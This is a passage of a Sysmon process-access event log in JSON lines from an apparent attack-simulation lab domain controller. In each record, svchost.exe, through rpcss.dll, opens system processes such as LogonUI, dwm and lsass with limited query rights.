{E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010B6CA0000}\r\nTargetProcessId: 1268\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010B6CA0000}","TargetProcessId":"1268","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E0D20200}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E0D20200}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
